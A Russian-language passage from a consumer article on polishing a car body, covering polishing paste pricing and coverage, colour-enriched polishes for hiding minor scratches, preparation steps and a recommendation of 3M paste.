Паста продается в тюбиках, общий объем которых не превышает 1 кг. Важно учитывать тот факт, что полироль будет стоить на порядок дороже, чем продукция аналогичных производителей (цена 1 тюбика варьируется в пределах от 1000 до 2000 руб.). Это обусловлено тем, что данное средство используется не только для первичной обработки кузова, но и в качестве защитного полироля. Таким образом, достаточно купить один тюбик. Его хватит для обработки 6-7 кузовов авто. В целом, отвечая на вопрос о том, как правильно полировать машину, важно учитывать, что паста наносится только с использованием шлифовальных агрегатов.

Особенности использования цветообогащенных полиролей

Огромное разнообразие средств по обработке кузова позволяет автовладельцу выбрать наиболее подходящий вариант. Если нет необходимости в полной полировке (например, при наличии микроцарапин), то можно воспользоваться цветообогащенной пастой. Её основное предназначение - скрытие мелких дефектов кузова, мест подкрашивания или потемнения краски. В большинстве случаев подобные полироли используются в процессе предпродажной подготовки авто.

Отвечая на вопрос о том, как правильно полировать машину подобными средствами, важно учесть, что работа так же, как и в других случаях, проводится только с использованием шлифовальных машинок. Для достижения оптимального результата необходимо перед нанесением состава тщательно промыть все части автомобиля, проблемные места (где есть глубокие сколы) обработать ремонтным восковым карандашом.

Итог

В заключение необходимо отметить, что полировка кузова автомобиля - продолжительный и трудоемкий процесс, требующий аккуратности и внимательности. В любом случае на качество полировки влияет первоначальная подготовка кузова автомобиля к предстоящим работам: промывка, поиск и работа с царапинами (сколами), покупка оборудования и расходных материалов. Если есть возможность приобрести пасту 3М, то лучше воспользоваться ей в целях осуществления качественных работ по защите кузова.

В целом, вопрос о том, как правильно полировать машину, не такой уж и сложный. Достаточно в точности выполнять последовательность действий и использовать качественное оборудование. Если проводить полировку кузова автомобиля систематически (раз в 3 месяца) с последующей обработкой защитными полиролями, яркость и блеск ЛКП сохранятся на протяжении большого периода времени.